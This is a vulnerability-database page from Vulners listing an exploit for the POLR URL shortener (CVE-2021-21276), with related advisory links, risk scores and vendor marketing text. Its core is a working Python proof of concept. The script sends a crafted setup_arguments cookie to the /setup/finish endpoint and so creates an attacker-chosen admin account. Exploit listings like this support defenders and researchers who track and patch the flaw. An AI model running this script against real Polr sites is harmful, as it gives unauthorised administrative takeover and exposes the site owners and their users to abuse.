Lucene search
K

POLR URL 2.3.0 Shortener Admin Takeover

🗓️ 06 Apr 2023 00:00:00Reported by p4kl0nc4tType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 265 Views

POLR URL 2.3.0 Shortener Admin Takeover, Exploit by p4kl0nc4t, Allows admin takeover via setup finish endpoint

Related
Code
ReporterTitlePublishedViews
Family
0day.today
POLR URL 2.3.0 - Shortener Admin Account Takeover Exploit
6 Apr 202300:00
zdt
Circl
CVE-2021-21276
1 Feb 202119:25
circl
CNNVD
Cydrobolt Polr Security Vulnerability
1 Feb 202100:00
cnnvd
CVE
CVE-2021-21276
1 Feb 202100:00
cve
Cvelist
CVE-2021-21276 Privilege escalation in Polr
1 Feb 202100:00
cvelist
Exploit DB
POLR URL 2.3.0 - Shortener Admin Takeover
6 Apr 202300:00
exploitdb
NVD
CVE-2021-21276
1 Feb 202115:15
nvd
Prion
Code injection
1 Feb 202115:15
prion
Positive Technologies
PT-2021-14382 · Polr · Polr
1 Feb 202100:00
ptsecurity
RedhatCVE
CVE-2021-21276
22 May 202521:32
redhatcve
Rows per page
`# Exploit Title: POLR URL 2.3.0 - Shortener Admin Takeover  
# Date: 2021-02-01  
# Exploit Author: p4kl0nc4t <me-at-lcat-dot-dev>  
# Vendor Homepage: -  
# Software Link: https://github.com/cydrobolt/polr  
# Version: < 2.3.0  
# Tested on: Linux  
# CVE : CVE-2021-21276  
  
  
import json  
  
import requests  
  
payload = {  
'acct_username': 'admin',  
'acct_password': 'password',  
'acct_email': '[email protected]',  
'setup_auth_key': True,  
}  
  
r = requests.get('http://localhost/setup/finish',  
cookies={'setup_arguments': json.dumps(payload)})  
print(r.text)  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

06 Apr 2023 00:00Current
9.3High risk
Vulners AI Score9.3
CVSS 26.4
CVSS 3.19.3
EPSS0.1976
265